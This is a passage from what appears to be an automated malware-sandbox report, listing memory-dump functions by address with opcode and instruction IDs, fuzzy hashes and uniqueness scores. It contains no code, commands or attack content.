                                                    • Instruction ID: e384981fb09a4292d0c9b369f6ffefb6ac0a41e0d468050d8981f7a018c78c6b
                                                    • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                    • Instruction Fuzzy Hash: 4031D6326047069BC719DF28C885A5BB7EAFBC4210F05492EF6968B651DE30E809C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015B69A6, Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4fd30df1d8cf765265bffd7c51d33255f7612085fd4f99ebe2c0194b5f5fcddd
                                                    • Instruction ID: 2d26125dcb7b229b9723848d8c66e84760d1c7c52d707c8251d005ba34ef2f74
                                                    • Opcode Fuzzy Hash: 4fd30df1d8cf765265bffd7c51d33255f7612085fd4f99ebe2c0194b5f5fcddd
                                                    • Instruction Fuzzy Hash: E34160B1D006099FDB24DFA9D981BFEBBF8FF48714F14812AE914AB240DB709905CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01535210, Relevance: .1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ca38678f3e5be759fc9a84c97c3deeefec65f9ff4d89a1f5a7c309a05ecb4f7
                                                    • Instruction ID: 535da6f4fa0a1fbfe7f1dbcc3f9e009121da9566f18b4da5d216f36af6b329b1
                                                    • Opcode Fuzzy Hash: 1ca38678f3e5be759fc9a84c97c3deeefec65f9ff4d89a1f5a7c309a05ecb4f7
                                                    • Instruction Fuzzy Hash: 4931D631651B12DBCB229B28C881F6E7BA9FFA0760F514E1AF9164F5D1EB70E900C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01573D43, Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8aad4ec28f5a8da57e211d616a32dffc8fcf66eeac5a75c96a9d48701bda02f3
                                                    • Instruction ID: 87d55c48beebf780b8378b853cf032d21337fc107894b94e95aa4b8d1bd115cc
                                                    • Opcode Fuzzy Hash: 8aad4ec28f5a8da57e211d616a32dffc8fcf66eeac5a75c96a9d48701bda02f3
                                                    • Instruction Fuzzy Hash: 0A31DE71600616DFD7658F2DE843A2EBBE5FF85760B05886AE946CF350E730D840D791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0156A61C, Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1951dc3b1a6665a43d696133822d4aacf40700c3637c4c145de589fc716cc4f3
                                                    • Instruction ID: 10ebe130f2c8e729dc27a0286d33960845a0e53233486d469bd0746a805776bf
                                                    • Opcode Fuzzy Hash: 1951dc3b1a6665a43d696133822d4aacf40700c3637c4c145de589fc716cc4f3
                                                    • Instruction Fuzzy Hash: 3E418CB5A0421ADFCB14CF58C890B9DBBF5BB99304F148069E905AF344D778AD41CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0155C182, Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction ID: a65ee907fb86ff8aa4027870364d08350cdc8796aa580b922ea59a4ba75ee090
                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction Fuzzy Hash: 1E311671A01647BBD745EBB8C4A0BEDFB99BF92244F04415BC81C4F201DB345A45C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015B7016, Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c476488411a98b8a7ce736d03d6ca22c71410f92877fb6b70c5826a533004ef6
                                                    • Instruction ID: 70cca6795c0fd827be76ba84b6174a02dc9bdd63dc38c12879f4c9752573f8e3
                                                    • Opcode Fuzzy Hash: c476488411a98b8a7ce736d03d6ca22c71410f92877fb6b70c5826a533004ef6
                                                    • Instruction Fuzzy Hash: BA31A6726047529BC320DF68CD81AAAB7F5FFCC700F044A29F9958B690E730E904CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0156A70E, Relevance: .1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26cab3dc2fc8e6111d3908c5ae57fe7b4628cde993d9cf69e7169bebb8df0184
                                                    • Instruction ID: 92ba4bff514707cbf2f37228b6db3242947ac0d4f31710d267005c25fdf8a9f5
                                                    • Opcode Fuzzy Hash: 26cab3dc2fc8e6111d3908c5ae57fe7b4628cde993d9cf69e7169bebb8df0184
                                                    • Instruction Fuzzy Hash: E931EFB1600A06DFC731CF18DC80F2ABBF9FBA4712F14095AE206AB244D374A911CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015661A0, Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec53b6e5a5049b02db60060e59744130f00e00b777f91a23d0a5488646091024
                                                    • Instruction ID: 884d8fe370e1952afa1202b882c4690fef5e2906155483202220dc91d911ae4e
                                                    • Opcode Fuzzy Hash: ec53b6e5a5049b02db60060e59744130f00e00b777f91a23d0a5488646091024
                                                    • Instruction Fuzzy Hash: 67318C71645702CFE320CF1DC900B2ABBE9FB88B04F45496DE9999B351E7B1E844CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0153AA16, Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e369f6cc5f72f53e9be1111a161f60dc47a23e9d313e34b67aa7c0c9ae836add
                                                    • Instruction ID: 06355e150e5a7230a72a52a919317bcf8310045cec070db781831f66e1147f3e
                                                    • Opcode Fuzzy Hash: e369f6cc5f72f53e9be1111a161f60dc47a23e9d313e34b67aa7c0c9ae836add
                                                    • Instruction Fuzzy Hash: 5531C372A0021AABDF119F68CD41A7FB7B8FF94700B01446AF945EF250E7759D11CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01574A2C, Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30658cd7ef88efd6933a4610480d3e1df603c7a055eae062f615649e256dd71a
                                                    • Instruction ID: 0a5e25beec33a319d04d8f9b8e2db764e715b6bdf18cc5c3f5a1393c94a50502
                                                    • Opcode Fuzzy Hash: 30658cd7ef88efd6933a4610480d3e1df603c7a055eae062f615649e256dd71a
                                                    • Instruction Fuzzy Hash: FB31EF322416629BC732AE58DD46B2EBBEAFFC0610F44442AE8660F641C7B0D800CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01578EC7, Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7901e343e323e72814398108aaca8a685d08df24e879cc8ba61778acde49a3bf
                                                    • Instruction ID: fb85f0894c532a6c2c8829a47567a4692641ee0a97c90264c8d89a29b2d9f8e8
                                                    • Opcode Fuzzy Hash: 7901e343e323e72814398108aaca8a685d08df24e879cc8ba61778acde49a3bf
                                                    • Instruction Fuzzy Hash: 044181B1D006299EDB20CFAAD981AEEFBF4FB48710F5041AEE519A7640E7705A84CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0156E730, Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6162647e607f4e656d1983ef1c152d1b35edfe135fed1fc79a85ed8f045ad9f7
                                                    • Instruction ID: 4b7cc7d48b19f52b077fa6a4782d632542b5f006aae1ac971fdde5af6b571f0a
                                                    • Opcode Fuzzy Hash: 6162647e607f4e656d1983ef1c152d1b35edfe135fed1fc79a85ed8f045ad9f7
                                                    • Instruction Fuzzy Hash: 1F318C79A1424AEFD744CF58D841F9ABBE8FB19214F148656F904CB341E635E890CBE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0156BC2C, Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3da61a44e7df5880cbacb15764bbf78e905d74569abcc472fac431ff7a038079
                                                    • Instruction ID: 77296587f13c3f9e2621a84018c13f1f96214b88d0022e2ea9065e5a89baadee
                                                    • Opcode Fuzzy Hash: 3da61a44e7df5880cbacb15764bbf78e905d74569abcc472fac431ff7a038079
                                                    • Instruction Fuzzy Hash: B6310E32A00A569BDB21DF58C8807AA77B8FB28311F140479EE04DF20AEB34DA15CBC4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01539100, Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6d6a324daa8cb73641e48a54ab5daf9104a2cbc8320ccf344ba8aff113b93f5
                                                    • Instruction ID: 52aaed18f4b9df3585f5bface997f65efb562f192993ef760b5aa01d9429bd24
                                                    • Opcode Fuzzy Hash: b6d6a324daa8cb73641e48a54ab5daf9104a2cbc8320ccf344ba8aff113b93f5
                                                    • Instruction Fuzzy Hash: C13191B5A00646DFDB66DFACC8887ADBBF1BBC8318F14814DD4057B281C3B0A980CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01561DB5, Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction ID: 3ad9f866d9adc63427a9de10a9178afcfceeeac63f739d629d4d49a86782dbba
                                                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction Fuzzy Hash: 01215A72640519EFD721CFA9CC90EAEBFBDFB85681F114056EA059F220D634EE11CAE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01550050, Relevance: .1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f22274a990c1f43c83acb8429cb120c59bc2f4b63bc61c48a74c9bff5b65176
                                                    • Instruction ID: 72b2035cae6a139118f34ee796bafaff22904bd78bfe2516c4cea09622a213fd
                                                    • Opcode Fuzzy Hash: 9f22274a990c1f43c83acb8429cb120c59bc2f4b63bc61c48a74c9bff5b65176
                                                    • Instruction Fuzzy Hash: EF31BF31201B05CFD762CF28C850B5AB3E5FF89714F14456DE9968BBA0EB35A801CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015B6C0A, Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a41ce58b7431b273feaadcebbb919a64bd004c476895a7106b077a11704a5b1d
                                                    • Instruction ID: 5b9640a5491d271821dbb340f84309346e833e5e276d46c880383b2c034f5822
                                                    • Opcode Fuzzy Hash: a41ce58b7431b273feaadcebbb919a64bd004c476895a7106b077a11704a5b1d
                                                    • Instruction Fuzzy Hash: E821BC71A00645AFD711DF68D880F6AB7B8FF58700F14006AF908CB791D634ED10CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015790AF, Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction ID: f96b4726594a9eab8bbf9f4ea30ac015209554f1f3c6c4cda7743070c7700b2b
                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction Fuzzy Hash: A5219571A00605EFDB21DF59E485E9AFBF8FB54364F14886AE945AF210D370ED50CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01563B7A, Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 27af9ac16572587e53315551799564bacdc513499bf88684386fb0b44edac917
                                                    • Instruction ID: e126cb59309d43edc4ace1a5fe65b1d870b1441bc601558115ffa2443e9ff7f7
                                                    • Opcode Fuzzy Hash: 27af9ac16572587e53315551799564bacdc513499bf88684386fb0b44edac917
                                                    • Instruction Fuzzy Hash: B7218E72A00509AFD710DF98DD81B5EBBBDFB44708F150069EA09AB252D371ED15CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015B6CF0, Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ba948c4ba6d0066887aa096db4d55a329382683c2b6f752d44fe08ad01bd7ab0
                                                    • Instruction ID: 3b7534f17d9b37dc02193b11d9de43ab0c75a1fbbe3c6e8382faef54e2dbba62
                                                    • Opcode Fuzzy Hash: ba948c4ba6d0066887aa096db4d55a329382683c2b6f752d44fe08ad01bd7ab0
                                                    • Instruction Fuzzy Hash: 2F21C2725042469FD711DF69C984BABBBECBFD1640F040966FE40CF251EB34D948C6A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0160070D, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                    • Instruction ID: b1a9209166ebecf74ce423d33b80595b790b3a57a635690059316528fb79b682
                                                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                    • Instruction Fuzzy Hash: F421F2362042019FD70ADF18CC94B6BBBA6FBD4350F04856DF9958B385D734D909CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015B7794, Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4689c798d1110504713537e2209dbbd43db77caf2c5302b2f44412be7ad51b9
                                                    • Instruction ID: 811eebbc670ed46da1de85febf386eacf7c652bfa4daa8e89795e9c2730de45b
                                                    • Opcode Fuzzy Hash: e4689c798d1110504713537e2209dbbd43db77caf2c5302b2f44412be7ad51b9
                                                    • Instruction Fuzzy Hash: 1E219272500605ABC725DF69DC90E9BBBB8FF8C340F10456DFA0ACB690D634D900CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0155AE73, Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                    • Instruction ID: d8e2df76ea3eb4e58c464a6872c54bdc0805eae19d12c68ab394be05a3775992
                                                    • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                    • Instruction Fuzzy Hash: 9C21F6326426869FE7169B2DC954B2D7BE8FF44340F5904A1DD048F7A2DB34DC40C6A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0156FD9B, Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction ID: 818ca1fe82886ca6785e28bef63e81c8044e4d6ca95819fa0faa6707a5c9ee38
                                                    • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction Fuzzy Hash: 6E216A72A41641DFD731CF49E550A6ABBF9FBA4A10F24856EE9558F711D730AC00CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0156B390, Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fad69c8d108b637b741bcfb4f2f49617e8004bef28f9e6e7afbf1ece9e8d732d
                                                    • Instruction ID: 28addf4fc44463f2fdc014b13e427f04d59139bd7ebf814d9f5dc294367f42f4
                                                    • Opcode Fuzzy Hash: fad69c8d108b637b741bcfb4f2f49617e8004bef28f9e6e7afbf1ece9e8d732d
                                                    • Instruction Fuzzy Hash: 581148333011219BCB298A189D81A6F72DAFBC5230B64012AED16CF380C9319C02C7D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01539240, Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 0e18db326c96f2feecf4c2d8bd39f74dcfed6794b9444dd2189d121c66dd66ac
                                                    • Instruction ID: 229a774557cab3256bb965f889ee4644c68d639be5bf838cc99c9f7ccab31ab4
                                                    • Opcode Fuzzy Hash: 0e18db326c96f2feecf4c2d8bd39f74dcfed6794b9444dd2189d121c66dd66ac
                                                    • Instruction Fuzzy Hash: CD218CB1051A02DFC322EF68CE40F19B7F9BF98308F40456CE0499B6A2C774E951CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015C4257, Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 629c624bebf983638c5593705c604337e1e3e483d0f0e6eb2fb2d779cb36c5ca
                                                    • Instruction ID: 2b43c317eb794535e29a56aa60a0ae849af0f4bcb8b0b12816302e4e5dbaa796
                                                    • Opcode Fuzzy Hash: 629c624bebf983638c5593705c604337e1e3e483d0f0e6eb2fb2d779cb36c5ca
                                                    • Instruction Fuzzy Hash: A5215B70901A02CFCB35DFA8DC11AA8BBF6FB85754F14926EC1458F299E73594A1CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01562397, Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 51c0085084dddaeb35b6c95baee85453b626e11051a33118bf9ea4775fedb91e
                                                    • Instruction ID: 55e218388fc3a8b309f5cf1e87b99a2a79e9af7ed08e76eb1f68a93fef6305cb
                                                    • Opcode Fuzzy Hash: 51c0085084dddaeb35b6c95baee85453b626e11051a33118bf9ea4775fedb91e
                                                    • Instruction Fuzzy Hash: 52112B3170071267E3319A29EC90F19B7DCBBE0650F14482BFA029F240D6B4E800C7D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015B46A7, Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                    • Instruction ID: edd8b50ef7e424ca56756e4ecd6bab57eca5873a433f9141026e49b9143e3450
                                                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                    • Instruction Fuzzy Hash: CA110272504209BBC7119F9CA8809BEBBB9FF99300F10806AF9848B351DA318D51C3A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0153C962, Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7df00f3b621104977e96af21e8a878e42d95ce61652fc9833e66da5c3ee6e0d8
                                                    • Instruction ID: 8d5e9c9ab2a4cd4f45807b919baccae2978f43c80a4cb6ecad1f66cf61d54ccb
                                                    • Opcode Fuzzy Hash: 7df00f3b621104977e96af21e8a878e42d95ce61652fc9833e66da5c3ee6e0d8
                                                    • Instruction Fuzzy Hash: E711E132340A07ABC720AF2CDC95E6F77E5FBD8614F500529E9428B651DB25ED14CBD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015737F5, Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e2ec1384f6f83881b00b52852ebdde8b32f87d3c0fbc771cac83b5f5140e251
                                                    • Instruction ID: 80a95f59f45b3bf35e705b48eacdc14cc739680f53b7116db41fd4acf7abbd70
                                                    • Opcode Fuzzy Hash: 5e2ec1384f6f83881b00b52852ebdde8b32f87d3c0fbc771cac83b5f5140e251
                                                    • Instruction Fuzzy Hash: 3E01C4B29026129BC3778E5EA941E2ABFE6FFC5A70715406AE9459F216D730C801D780
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0156002D, Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                    • Instruction ID: 7733d1fd45d931bb62c2c8f339a5d5367851d5ce0e97ab054b847a8fcbdbe596
                                                    • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                    • Instruction Fuzzy Hash: C611E532641686CFEB2387ACC554B3D77D8BB44764F8D00A0ED048F6A2D768D841C290
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0154766D, Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                    • Instruction ID: 1f37439b14253c202ee3b113f2e0d24240419677fae3b2670fe9619c4e91f50f
                                                    • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                    • Instruction Fuzzy Hash: 7901AC32700129ABD720DE6EDC55E9B7BAEFB88664F140525BA09CF250DB30DD01C7B0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01539080, Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eeb96608cd90b9bab862def8207b7dd40aa47cdeb8432c53d63381709fe3dcd8
                                                    • Instruction ID: 9f0e0f05cf6bfe7e77849aaf03404776a3fc4ff4b26f757faebbdb9a3e232f77
                                                    • Opcode Fuzzy Hash: eeb96608cd90b9bab862def8207b7dd40aa47cdeb8432c53d63381709fe3dcd8
                                                    • Instruction Fuzzy Hash: 8601DCB2A02A018FD3268F08DC44B16BBA9FBC1368F21502AE502DF692D2B0DC41CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015CC450, Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
